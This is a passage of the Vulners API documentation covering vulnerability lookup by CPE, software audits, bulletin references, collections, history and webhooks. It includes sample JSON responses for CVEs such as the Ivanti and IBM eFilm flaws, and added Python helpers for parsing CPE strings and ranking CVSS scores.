"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ivanti_connect_secure_cmd_inj",
"cvelist": [
"CVE-2023-46805",
"CVE-2024-21887"
],
"lastseen": "2024-02-12T13:22:01",
"ai_score": {
"value": 8.6,
"uncertanity": 2.4,
"vector": "NONE"
}
},
{
"id": "SAINT:CBB2F1CA8B177BA96AECA3D1FB0C7611",
"type": "saint",
"bulletinFamily": "exploit",
"title": "Invanti Connect Secure and Policy Secure authentication bypass and command injection",
"description": "Added: 01/18/2024 \n\n\n### Background\n\n[Ivanti Connect Secure](<https://www.ivanti.com/products/connect-secure-vpn>) is a web-based remote access VPN. \n\n### Problem\n\nAn authentication bypass vulnerability and a command injection vulnerability when exploited together could allow a remote unauthenticated attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the appropriate patch for your Ivanti product when available, or import the `mitigation.release.20240107.1.xml` file as a workaround. See the [Invanti knowledgebase article](<https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways>) for more information. \n\n### References\n\n<https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways> \n \n\n",
"published": "2024-01-18T00:00:00",
"modified": "2024-01-18T00:00:00",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ivanti_connect_secure_cmd_inj",
"cvelist": [
"CVE-2023-46805",
"CVE-2024-21887"
],
"lastseen": "2024-02-04T12:52:55",
"ai_score": {
"value": 8.7,
"uncertanity": 2.4,
"vector": "NONE"
}
}
]
]
Vulnerabilities by CPE product¶
To obtain all vulnerabilities, specify the CPE product and version as a string. CPE 2.3 consists of different parameters that can help identify a software product more accurately:
cpe:<cpe_version>:<part>:<vendor>:<product>:<version>:<update>:<edition>:<language>:<sw_edition>:<target_sw>:<target_hw>:<other>
Individual CPE components can also be passed as separate request parameters (listed below) to narrow the vulnerability search.
Required parameters:
- software (str): Common Platform Enumeration (CPE) identifier for the software (e.g., `cpe:/a:microsoft:windows_10:1909`)
- apiKey: Activated API key to authenticate the request.
Optional parameters:
- version (str): software version. Can also be given inside the `software` field.
- respect_major_version (str): If `true`, limits results to the specified major version. Default is `false`.
- exclude_any_version (str): If `true`, excludes extended versions and returns only the exact match. Default is `false`.
- only_ids (bool): If `true`, returns only the IDs of the vulnerabilities. Default is `false`.
Additional CPE attributes for refining search accuracy:
- update (str): Specifies the software update version to refine the search for vulnerabilities related to a specific update level. Examples include service packs (e.g. `sp1`) for Windows, patch versions, hotfixes, or other minor updates.
  Official NIST IR 7695 definition of `update`: Values for this attribute SHOULD be vendor-specific alphanumeric strings characterizing the particular update, service pack, or point release of the product. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
- language (str): Defines the language edition of the software, if applicable. Use this to target vulnerabilities in localized versions of the software.
  Official NIST IR 7695 definition of `language`: Values for this attribute SHALL be valid language tags as defined by [RFC5646], and SHOULD be used to define the language supported in the user interface of the product being described. Although any valid language tag MAY be used, only tags containing language and region codes SHOULD be used.
- sw_edition (str): Indicates the specific edition of the software (e.g., `home_premium` for Windows, `continuous` for Acrobat Reader, or `server` for Linux).
  Official NIST IR 7695 definition of `sw_edition`: Values for this attribute SHOULD characterize how the product is tailored to a particular market or class of end users. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification. Any character string meeting the requirements for WFNs (cf. 5.3.2) MAY be specified as the value of the attribute.
- target_sw (str): Specifies the platform where the software runs, such as `windows`, `macOS`, `linux`, or other environments like `java`, `chrome`, `azure`, etc. If not specified, the search will include software that runs on `*` or `windows` platforms.
  Official NIST IR 7695 definition of `target_sw`: Values for this attribute SHOULD characterize the software computing environment within which the product operates. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
- target_hw (str): Identifies the hardware platform for the software, such as `x86`, `x64`, `arm`, or specific devices like `router` or `mobile`.
  Official NIST IR 7695 definition of `target_hw`: Values for this attribute SHOULD characterize the instruction set architecture (e.g., `x86`) on which the product being described or identified by the WFN operates. Bytecode-intermediate languages, such as Java bytecode for the Java Virtual Machine or Microsoft Common Intermediate Language for the Common Language Runtime virtual machine, SHALL be considered instruction set architectures.
Possible values for CPE parameters:
- `*`: matches every value, both entries whose attribute is `-` or `*` and entries with a concrete value.
- `-`: filters results to exclude the specified value.
- `"software_name"`: matches entries with exactly this value and entries whose attribute is `*`.
Defaults:
By default, `target_sw` is set to `windows`, so if no platform is specified the search returns vulnerabilities in software running on `*` or `windows`. This avoids pulling in results for other platforms such as Android or macOS by default.
Query:
POST /api/v3/burp/softwareapi/
Query example for CPE identifier:
curl -XPOST https://vulners.com/api/v3/burp/softwareapi/ -H 'Content-Type: application/json' -d '{
"software": "cpe:2.3:o:microsoft:windows_10:1909:sp1:enterprise:en:windows",
"type": "cpe",
"maxVulnerabilities": 50,
"respect_major_version": "true",
"exclude_any_version": "false",
"only_ids": false,
"apiKey": "{API key}"
}'
cpe_results = vulners_api.get_cpe_vulnerabilities(
cpe="cpe:2.3:o:microsoft:windows_10:1909:sp1:enterprise:en:windows",
respect_major_version='true',
exclude_any_version='false',
only_ids='false'
)
cpe_exploit_list = cpe_results.get('exploit')
cpe_vulnerabilities_list = [cpe_results.get(key) for key in cpe_results if key not in ['info', 'blog', 'bugbounty']]
{
"vulnerabilities": [
{
"id": "CVE-2022-29132",
"title": "Remote Code Execution Vulnerability",
"description": "Details about Windows server vulnerability...",
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29132",
"cvelist": ["CVE-2022-29132"],
"lastseen": "2024-09-11T19:08:41",
"cpe": [
"cpe:/o:microsoft:windows_server_2012:r2:::",
"cpe:/o:microsoft:windows_server:20h2:::",
"cpe:/o:microsoft:windows_10:21h1:::"
// Truncated for brevity
],
"cpe23": [
"cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"
// Truncated for brevity
],
"cvss": {
"score": 8.0,
"severity": "HIGH",
"vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
}
},
"affectedSoftware": [
{
"cpeName": "microsoft:windows_10",
"version": "-",
"operator": "eq",
"name": "microsoft windows 10"
},
{
"cpeName": "microsoft:windows_10",
"version": "21h1",
"operator": "eq",
"name": "microsoft windows 10"
}
// Truncated for brevity
],
"ai_score": {
"value": 8.0,
"uncertainty": 0.1
}
},
{
"id": "CVE-2022-29137",
"title": "Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability",
"description": "Details about LDAP vulnerability...",
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29137",
"cvelist": ["CVE-2022-29137"],
"lastseen": "2024-09-11T19:14:24",
"cpe": [
"cpe:/o:microsoft:windows_server_2012:r2:::",
"cpe:/o:microsoft:windows_server_2019:-:::",
"cpe:/o:microsoft:windows_10:21h1:::"
// Truncated for brevity
],
"cpe23": [
"cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"
// Truncated for brevity
],
"cvss": {
"score": 8.8,
"severity": "HIGH",
"vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
}
},
"affectedSoftware": [
{
"cpeName": "microsoft:windows_server_2012",
"version": "r2",
"operator": "eq",
"name": "microsoft windows server 2012"
},
{
"cpeName": "microsoft:windows_10",
"version": "21h1",
"operator": "eq",
"name": "microsoft windows 10"
}
// Truncated for brevity
],
"ai_score": {
"value": 8.7,
"uncertainty": 0.1
}
}
]
}
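The following is an added example written for this page, not code from the Vulners SDK. It parses a CPE 2.3 formatted string in the positional order defined by NIST IR 7695, builds the request body shown in the cURL example above (passing the non-wildcard components additionally as the documented refining parameters, which is an assumption about how the two forms combine), and ranks a response by CVSS score. `SAMPLE_RESPONSE` is constructed from the two CVEs in the documented response and is not a live API result. One caveat the parser makes visible: CPE 2.3 components are positional, so in the documented example `cpe:2.3:o:microsoft:windows_10:1909:sp1:enterprise:en:windows` the value `enterprise` sits in the `edition` slot and `windows` in `sw_edition`; to bind them as `sw_edition` and `target_sw`, pad the intervening components with `*`.

```python
"""Helpers for the "Vulnerabilities by CPE product" method (added example, not part of the Vulners SDK)."""
import re

# Components that follow the "cpe:2.3" prefix, in NIST IR 7695 order.
CPE23_FIELDS = (
    "part", "vendor", "product", "version", "update", "edition",
    "language", "sw_edition", "target_sw", "target_hw", "other",
)
# Components this page documents as separate refining parameters.
REFINING_ATTRS = ("update", "language", "sw_edition", "target_sw", "target_hw")


def split_cpe23(cpe: str) -> list:
    """Split a formatted string on unescaped colons only.

    A colon inside a value is written "\\:" in the formatted-string binding,
    so a plain str.split(":") would cut such a value in two.
    """
    return re.split(r"(?<!\\):", cpe)


def parse_cpe23(cpe: str) -> dict:
    """Map a CPE 2.3 string to named components; absent trailing ones become "*"."""
    parts = split_cpe23(cpe)
    if parts[:2] != ["cpe", "2.3"]:
        raise ValueError(f"not a CPE 2.3 formatted string: {cpe!r}")
    values = parts[2:]
    if len(values) > len(CPE23_FIELDS):
        raise ValueError(f"too many components in {cpe!r}")
    values = values + ["*"] * (len(CPE23_FIELDS) - len(values))
    return dict(zip(CPE23_FIELDS, values))


def build_softwareapi_request(cpe: str, api_key: str, max_vulnerabilities: int = 50,
                              respect_major_version: bool = True,
                              exclude_any_version: bool = False,
                              only_ids: bool = False) -> dict:
    """Build the JSON body for POST /api/v3/burp/softwareapi/.

    The full CPE goes into "software" as in the cURL example. Components that
    are not the ANY wildcard are also passed as the documented refining
    parameters (assumption: the API accepts both at once). The two version
    flags are sent as the strings "true"/"false", matching the documented body.
    """
    comps = parse_cpe23(cpe)
    body = {
        "software": cpe,
        "type": "cpe",
        "maxVulnerabilities": max_vulnerabilities,
        "respect_major_version": str(respect_major_version).lower(),
        "exclude_any_version": str(exclude_any_version).lower(),
        "only_ids": only_ids,
        "apiKey": api_key,
    }
    for attr in REFINING_ATTRS:
        if comps[attr] != "*":
            body[attr] = comps[attr]
    return body


def rank_vulnerabilities(response: dict, min_score: float = 0.0) -> list:
    """Return (id, score, vector) tuples sorted by CVSS score, highest first.

    A record without a cvss block scores 0.0 instead of raising, so one odd
    entry does not abort triage of the rest.
    """
    ranked = []
    for vuln in response.get("vulnerabilities", []):
        cvss = vuln.get("cvss") or {}
        score = float(cvss.get("score", 0.0))
        if score >= min_score:
            ranked.append((vuln["id"], score, cvss.get("vector", "")))
    ranked.sort(key=lambda row: row[1], reverse=True)
    return ranked


# Constructed from the two entries in the documented response, listed with the
# lower score first so that the sort is visible.
SAMPLE_RESPONSE = {
    "vulnerabilities": [
        {"id": "CVE-2022-29132",
         "cvss": {"score": 8.0, "severity": "HIGH",
                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}},
        {"id": "CVE-2022-29137",
         "cvss": {"score": 8.8, "severity": "HIGH",
                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}},
    ]
}

if __name__ == "__main__":
    body = build_softwareapi_request("cpe:2.3:a:mozilla:firefox:117.0:*:*:en:*:windows:x64:*", "{API key}")
    print(body)
    for cve_id, score, vector in rank_vulnerabilities(SAMPLE_RESPONSE, min_score=7.0):
        print(f"{cve_id}: {score} ({vector})")
```

Post the returned body with any HTTP client; the ranking step is where a scanner integration would apply its own threshold before opening tickets.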
Software Audit¶
This method helps to identify security vulnerabilities (CVEs) in the software installed on the operating system. By providing detailed information about the software (`software` name, `version`, and optional parameters such as `update`, `language`, `sw_edition`, etc.), it can return more accurate and relevant vulnerability data. The more information you provide, the better the API can match vulnerabilities to the audited software.
Required parameters:
- os (str): Operating system name
- version (str): Operating system version (the cURL example below sends it as `osVersion`; the SDK call takes it as `version`)
- packages (list): List of dictionaries containing software and version information, with optional CPE parameters. Example:
  `{ "software": "Mozilla Firefox", "version": "117.0", "sw_edition": "home_premium", "target_sw": "windows", "target_hw": "x64", "update": "sp2", "language": "en" }`
- apiKey: Activated API key
Additional CPE attributes for refining search accuracy:
-
update (str): Specifies the software update version to refine the search for vulnerabilities related to a specific update level. Examples include
service packs
(e.gsp1
) for Windows, patch versions, hotfixes, or other minor updates.Official NIST 7695 for
update
Values for this attribute SHOULD be vendor-specific alphanumeric strings characterizing the particular update, service pack, or point release of the product. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
-
language (str): Defines the language edition of the software, if applicable. Use this to target vulnerabilities in localized versions of the software.
Official NIST 7695 for
language
Values for this attribute SHALL be valid language tags as defined by [RFC5646], and SHOULD be used to define the language supported in the user interface of the product being described. Although any valid language tag MAY be used, only tags containing language and region codes SHOULD be used.
-
sw_edition (str): Indicates the specific edition of the software. (e.g.,
home_premium
for Windows,continuous
for Acrobat Reader, orserver
for Linux)Official NIST 7695 for
sw_edition
Values for this attribute SHOULD characterize how the product is tailored to a particular market or class of end users. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification. Any character string meeting the requirements for WFNs (cf. 5.3.2) MAY be specified as the value of the attribute.
-
target_sw (str): Specifies the platform where the software runs, such as
windows
,macOS
,linux
, or other environments likejava
,chrome
,azure
, etc. If not specified, the search will include software that runs on*
orwindows
platforms.Official NIST 7695 for
target_sw
Values for this attribute SHOULD characterize the software computing environment within which the product operates. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
-
target_hw (str): Identifies the hardware platform for the software, such as
x86
,x64
,arm
, or specific devices likerouter
ormobile
.Official NIST 7695 for
target_hw
Values for this attribute SHOULD characterize the instruction set architecture (e.g.,
x86
) on which the product being described or identified by the WFN operates. Bytecode-intermediate languages, such as Java bytecode for the Java Virtual Machine or Microsoft Common Intermediate Language for the Common Language Runtime virtual machine, SHALL be considered instruction set architectures.
Possible values for CPE parameters:
- *: Includes all values, both those containing - or * and those without.
- "-": Filters results to exclude the specified values.
- "software_name": Includes results with this value and any values containing *.
Query:
POST /api/v3/burp/packages/
Query example:
curl -X POST 'https://vulners.com/api/v3/burp/packages/' \
-H 'Content-Type: application/json' \
-d '{
"os": "Ubuntu",
"osVersion": "22.04",
"packages": [
{"software": "LibreOffice", "version": "7.6.1", "sw_edition": "enterprise", "target_sw": "linux", "target_hw": "x64"}
],
"apiKey": "{API key}"
}'
packages = vulners_api.software_audit(
os='Ubuntu',
version='22.04',
packages=[
{"software": "LibreOffice", "version": "7.6.1", "sw_edition": "enterprise", "target_sw": "linux", "target_hw": "x64"}
]
)
[
{
"id": [
"CVE-2023-6185",
"CVE-2023-6186"
],
"package": "libreoffice",
"version": "7.6.1"
}
]
Get references for the vulnerability¶
Get all bulletins by identifier.
Required parameters:
- id (str): document id
- references: True or False
- apiKey: Activated API key
Query:
POST /api/v3/search/id/
Query example:
curl -X POST https://vulners.com/api/v3/search/id/ -H 'Content-Type: application/json' -d '{
"id": "CVE-2024-23622",
"fields": [
"id",
"title",
"description",
"type",
"bulletinFamily",
"cvss",
"published",
"modified",
"lastseen",
"href",
"sourceHref",
"sourceData",
"cvelist"],
"references": "True",
"apiKey": "{API key}"
}'
references = vulners_api.get_bulletin_references("CVE-2024-23622")
{
"nvd": [
{
"lastseen": "2024-09-04T15:05:23",
"description": "A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges.\n",
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH"
}
},
"published": "2024-01-26T00:15:10",
"type": "nvd",
"title": "CVE-2024-23622",
"cwe": [
"CWE-787",
"CWE-131"
],
"bulletinFamily": "cve",
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"baseScore": 10.0,
"baseSeverity": "HIGH",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"availabilityImpact": "COMPLETE",
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
},
"cvelist": [
"CVE-2024-23622"
],
"modified": "2024-01-31T20:30:40",
"id": "NVD:CVE-2024-23622",
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-23622",
"cvss": {
"score": 9.8,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"cvelist": [
{
"lastseen": "2024-08-06T17:32:14",
"description": "A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges.\n",
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH"
}
},
"published": "2024-01-25T23:36:03",
"type": "cvelist",
"title": "CVE-2024-23622 IBM Merge Healthcare eFilm Workstation License Server CopySLS_Request3 Buffer Overflow",
"cwe": [
"CWE-131"
],
"bulletinFamily": "cve",
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"baseScore": 10.0,
"baseSeverity": "HIGH",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"availabilityImpact": "COMPLETE",
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
},
"cvelist": [
"CVE-2024-23622"
],
"modified": "2024-01-25T23:36:03",
"id": "CVELIST:CVE-2024-23622",
"href": "https://www.cve.org/CVERecord?id=CVE-2024-23622",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"prion": [
{
"lastseen": "2024-03-10T22:50:43",
"description": "A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges.",
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
}
},
"published": "2024-01-26T00:15:00",
"type": "prion",
"title": "Stack overflow",
"bulletinFamily": "NVD",
"cvss2": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false,
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0
},
"severity": "HIGH"
},
"cvelist": [
"CVE-2024-23622"
],
"modified": "2024-01-31T20:30:00",
"id": "PRION:CVE-2024-23622",
"href": "https://www.prio-n.com/kb/vulnerability/CVE-2024-23622",
"cvss": {
"score": 10.0,
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"
}
}
]
}
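Note that the sources in the response above do not agree: NVD and Prion score the CVSS v3 vector with scope S:U at 9.8, CVE List scores S:C at 10.0, and Prion's summary "cvss" field carries a v2 vector. The following added example (not part of the Vulners SDK or this documentation) reads each source's cvss3.cvssV3 block, reports the highest score and lists the base metrics on which the sources differ; its input is a constructed, trimmed copy of that response.

```python
"""Reconcile CVSS v3 data across the sources returned by /api/v3/search/id/
with references enabled. Added example; not part of the Vulners SDK or docs."""
from typing import Dict, Set

# Constructed sample: a trimmed copy of the page's CVE-2024-23622 response,
# keeping only the identifiers and CVSS fields this example reads.
SAMPLE_REFERENCES = {
    "nvd": [{
        "id": "NVD:CVE-2024-23622",
        "cvss3": {"cvssV3": {"version": "3.1", "baseScore": 9.8,
                             "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}},
        "cvss": {"score": 9.8, "version": "3.1",
                 "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},
    }],
    "cvelist": [{
        "id": "CVELIST:CVE-2024-23622",
        "cvss3": {"cvssV3": {"version": "3.1", "baseScore": 10.0,
                             "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}},
        "cvss": {"score": 10.0, "version": "3.1",
                 "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},
    }],
    "prion": [{
        "id": "PRION:CVE-2024-23622",
        "cvss3": {"cvssV3": {"version": "3.1", "baseScore": 9.8,
                             "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}},
        # Prion's summary block holds a v2 vector, so "cvss" alone is not
        # comparable across sources; this example reads cvss3 instead.
        "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"},
    }],
}


def parse_cvss_vector(vector: str) -> Dict[str, str]:
    """Split a CVSS v2 or v3.x vector string into a metric -> value map."""
    parts = vector.split("/")
    if parts and parts[0].startswith("CVSS:"):
        parts = parts[1:]  # drop the "CVSS:3.1" prefix; v2 vectors have none
    metrics = {}
    for part in parts:
        name, _, value = part.partition(":")
        if name and value:
            metrics[name] = value
    return metrics


def summarize_cvss3(references: dict) -> dict:
    """Collect each source's CVSS v3 base score and report the metrics on which
    the sources disagree. Sources without a cvss3 block are skipped rather than
    silently mixed with v2 data from the summary "cvss" field."""
    scores: Dict[str, float] = {}
    vectors: Dict[str, Dict[str, str]] = {}
    for bulletins in references.values():
        for bulletin in bulletins:
            v3 = (bulletin.get("cvss3") or {}).get("cvssV3") or {}
            if "baseScore" not in v3 or "vectorString" not in v3:
                continue
            scores[bulletin["id"]] = float(v3["baseScore"])
            vectors[bulletin["id"]] = parse_cvss_vector(v3["vectorString"])

    disagreeing: Set[str] = set()
    metric_names = set().union(*vectors.values()) if vectors else set()
    for metric in metric_names:
        if len({vec.get(metric) for vec in vectors.values()}) > 1:
            disagreeing.add(metric)

    return {
        "scores": scores,
        "max_score": max(scores.values()) if scores else None,
        "disagreeing_metrics": disagreeing,
    }


if __name__ == "__main__":
    summary = summarize_cvss3(SAMPLE_REFERENCES)
    print("highest CVSS v3 score:", summary["max_score"])
    print("sources disagree on:", sorted(summary["disagreeing_metrics"]) or "nothing")
    for bulletin_id, score in sorted(summary["scores"].items()):
        print(f"  {bulletin_id}: {score}")
```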
Query autocompletions¶
This is helpful for general inquiries. For instance, if no other information is available, you can simply provide the title of your bulletin.
Required parameters:
- query (str): Search query by Lucene syntax
- apiKey: Activated API key
Query:
POST /api/v3/search/autocomplete/
Query example:
curl -XPOST https://vulners.com/api/v3/search/autocomplete/ -H 'Content-Type: application/json' -d '{
"query": "heartbleed",
"apiKey": "{API key}"
}'
possible_autocomplete = vulners_api.query_autocomplete("heartbleed")
[
"id:\"NMAP:SSL-HEARTBLEED.NSE\"",
"heartbleed",
"Heartbleed",
"HeartBleed",
"'heartbleed"
]
Collections¶
Get vulnerabilities for os + version¶
Required parameters:
- os: os name
- version: os version
- apiKey: Activated API key
Query:
GET /api/v3/archive/distributive/
Query example:
curl -G "https://vulners.com/api/v3/archive/distributive/" \
--data-urlencode "os=ubuntu" \
--data-urlencode "version=23.04" \
--data-urlencode "apiKey={API key}" \
--output output_data.zip
vulners_api.get_distributive("ubuntu", "23.04")
Full archive
Get collection by name¶
Required parameters:
- type (str): The collection type. See all collections here.
- datefrom (str): The start date in the format YYYY-MM-DD. Recommended for updating already downloaded collections. For example, use the last three days to get recent updates.
- dateto (str): The end date in the format YYYY-MM-DD. Recommended for updating already downloaded collections. For example, use the last three days to get recent updates.
- apiKey: The activated API key to authenticate the request.
Query:
GET /api/v3/archive/collection/
Query example:
curl -G -L "https://vulners.com/api/v3/archive/collection/" \
--data-urlencode "type=attackerkb" \
--data-urlencode "datefrom=2024-01-01" \
--data-urlencode "dateto=2024-10-30" \
--data-urlencode "apiKey={API KEY}" \
--output output_data.zip
vulners_api.get_collection('exploitdb', start_date="2024-07-14", end_date="2024-07-14")
Full archive
Get bulletin history¶
Required parameters:
- id (str): bulletin id
- apiKey: Activated API key
Query:
POST /api/v3/search/history/
Query example:
curl -XPOST https://vulners.com/api/v3/search/history/ -H 'Content-Type: application/json' -d '{
"id": "CVE-2024-23622",
"apiKey": "{API key}"
}'
vulners_api.get_bulletin_history("CVE-2024-23622")
[
{
"bulletinId": "CVE-2024-23622",
"field": "cvss3",
"value": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
}
},
"edition": 1,
"published": "2024-01-31T23:48:24"
},
{
"bulletinId": "CVE-2024-23622",
"field": "epss",
"value": [
{
"cve": "CVE-2024-23622",
"epss": 0.0027,
"percentile": 0.64574,
"modified": "2024-01-31"
}
],
"edition": 1,
"published": "2024-01-31T23:48:24"
},
...
]
Webhook¶
This section details the API methods for adding, listing, and modifying webhook subscriptions so that applications can quickly respond to new security threats or updates.
Add webhook¶
Required parameters:
- query: Search query using Lucene syntax. Defines the criteria for triggering the webhook.
- apiKey: Activated API key required for authentication.
Query:
POST /api/v3/subscriptions/addWebhookSubscription/
Query example:
curl -XPOST https://vulners.com/api/v3/subscriptions/addWebhookSubscription/ -H 'Content-Type: application/json' -d '{
"query": "viewCount:[50 TO *] order:viewCount last 8 days",
"apiKey": "{API key}"
}'
new_webhook = vulners_api.add_webhook("viewCount:[50 TO *] order:viewCount last 8 days")
{
"result": "OK",
"data": {
"subscriptionid": "{subscription id}",
"subscription": {
"id": "{subscription id}",
"query": "viewCount:[50 TO *] order:viewCount last 8 days",
"active": true,
"webhook": "https://vulners.com/api/v3/subscriptions/webhook?newest_only=true&subscriptionid={subscription id}&apiKey={api key}"
}
}
}
Get webhook¶
Required parameters:
